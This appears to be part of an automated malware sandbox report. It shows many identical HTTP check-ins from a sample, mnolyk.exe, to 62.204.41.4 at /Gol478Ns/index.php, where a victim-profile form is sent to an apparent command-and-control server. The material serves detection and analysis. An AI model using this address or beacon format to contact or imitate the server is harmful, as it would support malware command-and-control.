                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:29.549381971 CET794INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      335192.168.2.75006362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:29.786602974 CET795OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:29.851991892 CET795INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      336192.168.2.75006462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:30.054049969 CET796OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:30.121550083 CET796INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      337192.168.2.75006562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:30.338042974 CET797OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:30.403852940 CET797INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      338192.168.2.75006662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:30.995908022 CET798OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:31.059571981 CET798INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      339192.168.2.75006762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:31.325633049 CET799OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:31.389426947 CET799INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      34192.168.2.74975862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:05.847455978 CET466OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:05.912489891 CET466INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      340192.168.2.75006862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:32.325881958 CET800OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:32.394088030 CET800INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      341192.168.2.75006962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:32.561893940 CET801OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:32.625941038 CET801INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      342192.168.2.75007062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:32.801482916 CET802OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:32.867610931 CET802INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      343192.168.2.75007162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:33.042572021 CET803OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:33.107430935 CET803INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      344192.168.2.75007262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:33.278393030 CET804OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:33.342987061 CET804INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      345192.168.2.75007362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:33.536848068 CET805OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:33.602340937 CET805INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      346192.168.2.75007462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:33.782820940 CET806OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:33.846342087 CET806INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      347192.168.2.75007562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:34.012824059 CET807OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:34.078227997 CET807INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      348192.168.2.75007662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:34.245536089 CET808OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:34.309325933 CET808INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      349192.168.2.75007762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:34.482978106 CET809OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:34.547892094 CET809INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      35192.168.2.74975962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:06.092267990 CET467OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:06.159295082 CET467INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      350192.168.2.75007862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:34.718344927 CET810OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:34.786504030 CET810INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      351192.168.2.75007962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:34.965163946 CET811OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:35.029045105 CET811INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
